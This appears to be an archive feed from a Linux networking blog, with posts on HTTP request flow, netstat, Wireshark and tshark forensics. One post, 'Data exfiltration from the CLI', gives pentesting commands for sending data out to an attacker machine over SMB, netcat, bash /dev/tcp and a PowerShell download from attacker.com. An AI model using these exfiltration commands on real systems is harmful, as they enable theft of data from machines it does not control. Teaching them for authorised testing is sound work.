Black Bytes » Networking
http://www.blackbytes.info
Linux & Programming tips
Wed, 08 Apr 2015 17:38:12 +0000

Life of a web request
http://www.blackbytes.info/2015/03/http-request/
Sun, 01 Mar 2015 14:31:25 +0000

Every time you click on a link or directly type an address, a number of steps have to happen for the site to show on your screen. It may be a bit intimidating because multiple protocols and servers are involved in the process. In reality it’s not that hard, so please follow me and let’s dive in!

It all starts with one packet

The first thing your browser needs to do when you click that link is to resolve the domain name to an IP address. It does this using the Domain Name System (DNS), which gives the browser the server's IP address. DNS normally runs over the UDP transport protocol, but TCP is also an option.


Most operating systems have tools to manually resolve a host name. Here is an example using the host command in Linux.

[screenshot: host-resolution]

In Wireshark you can use the 'dns' display filter to find DNS requests.

The initial connection

Once the browser has the IP address it can open a connection to the web server. To do this it uses TCP/IP and by default it will connect to port 80. A TCP connection is established using the "three-way handshake".


This is a sequence of three TCP packets carrying the following flags: SYN / SYN-ACK / ACK. We can see this in Wireshark using the 'tcp' display filter.

[screenshot: three-way-handshake]

The http request

The next step in our journey is to tell the web server what page we want. The browser has to prepare an HTTP GET request asking for that page. This is what a minimal HTTP request looks like:

GET / HTTP/1.1
Host: www.blackbytes.info

You can try this at home if you have netcat or a similar program: connect to the server on port 80, paste this request and hit Enter twice, and you will get back a bunch of HTML.

[screenshot: http request]

Of course, there is an easier way, since building an HTTP request by hand every time gets tiresome. The curl tool will make the request for you and has some useful options; for example, with -I it fetches just the HTTP headers and shows them to you, which is very helpful when troubleshooting.

[screenshot: http request using curl]

You can use the 'http' display filter in Wireshark to show only HTTP traffic. There are also a number of tools that act as a proxy and let you see, and even modify, requests as your browser makes them; Fiddler and Burp Proxy are two examples.

Redirected

If the HTTP response code is not '200 OK' it means there was some problem with the request; the code helps us and the browser determine what's wrong. A 301 or 302 means the resource is somewhere else: the browser has to send a new request, this time for the resource indicated by the 'Location' header. Thankfully it won't need to restart the whole process if Keep-Alive is enabled.
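As an added example (not code from the original post), here is the redirect step written out in POSIX shell: it parses a response to the minimal GET shown above, builds the follow-up request from the Location header, and checks when Keep-Alive actually lets the browser skip a new handshake. The 301 response is constructed, and only http:// locations are handled, as in the post.

```shell
# Constructed sample: the kind of 301 a server might send back for "GET / HTTP/1.1".
SAMPLE_RESPONSE='HTTP/1.1 301 Moved Permanently
Location: http://www.blackbytes.info/2015/03/http-request/
Connection: keep-alive
Content-Length: 0'

# http_status RESPONSE: print the numeric status code from the status line
http_status() {
    printf '%s\n' "$1" | head -n1 | tr -d '\r' | awk '{ print $2 }'
}

# http_header RESPONSE NAME: print the value of header NAME (matched case-insensitively)
http_header() {
    printf '%s\n' "$1" | tr -d '\r' |
        awk -v name="$2" 'tolower($0) ~ "^" tolower(name) ":" { sub(/^[^:]*:[ \t]*/, ""); print; exit }'
}

# next_request RESPONSE: on a 301/302, print the follow-up minimal GET for the
# Location URL (http:// only, as in the post); otherwise print nothing and fail
next_request() {
    case "$(http_status "$1")" in
        301|302) ;;
        *) return 1 ;;
    esac
    rest=$(http_header "$1" Location)
    rest=${rest#http://}
    new_host=${rest%%/*}
    case "$rest" in
        */*) new_path=/${rest#*/} ;;
        *)   new_path=/ ;;
    esac
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\n\r\n' "$new_path" "$new_host"
}

# can_reuse_connection RESPONSE CURRENT_HOST: Keep-Alive only saves the handshake
# when the redirect points back at the host we are connected to and the server
# did not ask us to close the connection
can_reuse_connection() {
    rest=$(http_header "$1" Location)
    rest=${rest#http://}
    [ "${rest%%/*}" = "$2" ] && [ "$(http_header "$1" Connection | tr 'A-Z' 'a-z')" != "close" ]
}

next_request "$SAMPLE_RESPONSE"
if can_reuse_connection "$SAMPLE_RESPONSE" www.blackbytes.info; then
    echo "redirect can reuse the existing connection"
else
    echo "redirect needs a new connection"
fi
```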

The last steps

There are a few more steps that the browser doesn't have to worry about; for example, there might be a load balancer between the server you are connecting to and the actual web servers. Once the response is received the browser starts parsing the HTML and opens a few more connections: modern browsers can open up to 6 connections to download assets (like images or CSS files) in parallel.

Watching your network
http://www.blackbytes.info/2014/03/watching-your-network/
Sat, 29 Mar 2014 19:32:54 +0000

There are a number of tools you can use in Linux to see what is going on at the network level on your machine; one of the most common is netstat. This command will show you all the connections on your system, including some that you may not be interested in, like UNIX sockets. There are a few flags you can pass to netstat; my favourite set is -antp:

-a all
-n show ip instead of host names
-t show only tcp connections
-p show process id/name

Another command that will give you similar results is: lsof -nPi

What if you wanted to see the 10 IP addresses with the most connections to your server? You could use a one-liner like this one I came up with:

netstat -ant | grep -i establ | awk -F" " '{print $5}' | cut -d':' -f 1 | sort -n | uniq -c | sort -nr | head -n10
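As an added example (not from the original post), the same top-talkers count written as a shell function that also copes with tcp6 lines, where cutting at the first colon would mangle the address. The netstat output it reads is constructed, using documentation-range addresses.

```shell
# Constructed netstat -ant output standing in for the live command.
SAMPLE_NETSTAT='Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:80             203.0.113.7:51234       ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.7:51235       ESTABLISHED
tcp        0      0 10.0.0.5:80             198.51.100.9:40001      ESTABLISHED
tcp        0      0 10.0.0.5:22             198.51.100.9:40002      TIME_WAIT
tcp6       0      0 ::ffff:10.0.0.5:80      ::ffff:203.0.113.7:51236 ESTABLISHED
tcp6       0      0 2001:db8::5:80          2001:db8::99:55000      ESTABLISHED'

# top_talkers [N]: read netstat -ant output on stdin and print the N (default 10)
# remote addresses with the most ESTABLISHED connections.
# Compared with the one-liner: the state is matched exactly in its own column,
# the port is stripped from the *end* of the address so IPv6 addresses (which
# contain colons) survive, and IPv4-mapped IPv6 addresses are folded into their
# plain IPv4 form so one client is counted once.
top_talkers() {
    awk '$1 ~ /^tcp/ && $6 == "ESTABLISHED" {
            addr = $5
            sub(/:[^:]*$/, "", addr)   # drop the trailing :port
            sub(/^::ffff:/, "", addr)  # ::ffff:203.0.113.7 is the same host as 203.0.113.7
            print addr
        }' | sort | uniq -c | sort -rn | head -n "${1:-10}"
}

# Against a live box you would run: netstat -ant | top_talkers
printf '%s\n' "$SAMPLE_NETSTAT" | top_talkers
```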

You can also see connections live as they are being made. For that you can use the "watch" command, which re-runs any command every X seconds (2 by default) and shows you the output. So to see all the connections on port 80 refreshed every five seconds you would run:

watch -n5 "netstat -antp | grep :80"

There are other tools that also let you see live connections and even get an idea of the traffic you are getting, such as iptraf and iftop. If you need to see the actual data going through your network you will need a packet sniffer like tcpdump or Wireshark.

Data exfiltration from the CLI
http://www.blackbytes.info/2013/12/data-exfiltration-from-the-cli/
Sun, 29 Dec 2013 19:04:03 +0000

If you do pentesting or any kind of security analysis you have probably found yourself needing to transfer data between your machine and the vulnerable machine. It is useful to know a few ways to do this in case one of them doesn't work in your specific situation.

Generic

Samba can be configured on the attacker machine so that you can connect from the vulnerable machine using the "net use" (Windows) or "mount -t cifs" (Linux) commands and then transfer files.

example:
net use z: \\192.168.1.20 /u:attacker

smb.conf documentation: http://www.samba.org/samba/docs/using_samba/ch06.html

FTP is another way to do this, but remember that both the data and the login credentials travel in plain text. Also, since the client is interactive, if you only have a non-interactive shell you will need to script it.

example for the windows ftp client:
open ftp.domain.com
username
password
get file.txt
bye

run with ftp -s:script-name.txt

example for the linux ftp client:
http://www.stratigery.com/scripting.ftp.html

TFTP is a simpler version of FTP: it uses UDP and doesn't support authentication. A popular TFTP server is Tftpd32. It's still in use for things like backing up a router configuration or uploading the latest firmware.

SSH lets us transfer data securely; we can use the scp command to copy files over SSH.

Netcat is also an option; it is available in most Linux distributions and there is also a Windows version. If you need encryption, try cryptcat or socat.

example:
echo data | nc 192.168.1.20 80

Linux specific

On Linux you can use /dev/tcp/<host>/<port> to open a connection to another host (you need a recent version of Bash for this to work), with netcat on the other end to capture the data.

example:
echo secret_data.txt > /dev/tcp/192.168.1.20/500

Windows specific

On Windows we can use PowerShell to open TCP connections or download files over HTTP.

example:

$http = New-Object System.Net.WebClient
$url  = "http://www.attacker.com"
$file = "test.html"
$http.DownloadFile($url, $file)

As you can see there are many ways for transferring files, so pick the one that suits you best and enjoy!

Wireshark: Quick tips
http://www.blackbytes.info/2013/10/wireshark-quick-tips/
Thu, 10 Oct 2013 14:37:05 +0000

Do you want to learn some new tricks to make your Wireshark experience better? You have come to the right place, let’s get going!

Protocol statistics + Apply as filter

To get a sense of the kind of traffic you have on a packet capture session you can use the protocol statistics window. To open it go to Statistics > Protocol Hierarchy. If you see some traffic that shouldn’t be there you can just right-click and apply as filter to zoom in and see what’s going on.


Saving and removing display filters

One of the features you will use most often in Wireshark is display filters, so anything that makes working with them easier is welcome. You can save a common filter as a button for quick access: enter your filter, click 'Save', give it a name and you are done!


You might also want to remove or rename some of your saved filters, for that you can go to Edit > Preferences > Filter Expressions.


Using time references

As you may know you can view the time column in different formats, the most useful ones are ‘time since last packet’, and ‘time since start of capture’.

What if you wanted to know how long it took between two specific packets that aren't one after the other? That's what time references are for: select your starting packet and press Control + T; if it asks you to switch time format say 'yes', and you will see the times relative to that packet.


Hope you found that useful, if you have any other cool Wireshark tips please leave a comment :)

Network forensics with tshark
http://www.blackbytes.info/2013/09/network-forensics-with-tshark/
Sun, 15 Sep 2013 12:18:18 +0000

Let’s say we have a packet capture file (.pcap) and we want to get as much information out of it as possible. One option could be wireshark and its command line version tshark. Using the latter we will be able to manipulate and format the output using tools like sed, grep, awk…

Extracting host names with tshark

Since we are dealing mostly with HTTP traffic we may be interested in the sites that have been visited. To obtain this information we extract the http.host field and do a bit of sorting, which shows us the top 10 sites.

tshark -T fields -e http.host -r tor.pcap > dns.txt
cat dns.txt | sort | uniq -c | sort -nr | head


User agents

tshark -R 'http contains "User-Agent:"' -T fields -e http.user_agent -r tor2b.pcap | sort | uniq -c | sort -nr | less


The option -R lets us define display filters in the same way we would in Wireshark (note that in newer tshark versions -R is a two-pass read filter and the display filter option is -Y, as used in the last example below). You can find a list of useful display filters here.

Email address

Another interesting bit of data is email addresses, which we can extract by running a regexp over the raw text data.

tshark -r tor.pcap -R "data-text-lines" -T fields -e text > alldata.txt
grep -Eio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' alldata.txt | sort | uniq


Requested urls

We can also get a list of all the requested URLs (via the GET method):

tshark -r http-traffic.pcap -T fields -e http.host -e http.request.uri -Y 'http.request.method == "GET"' | sort | uniq | less


Don’t forget to take a look at the official documentation.
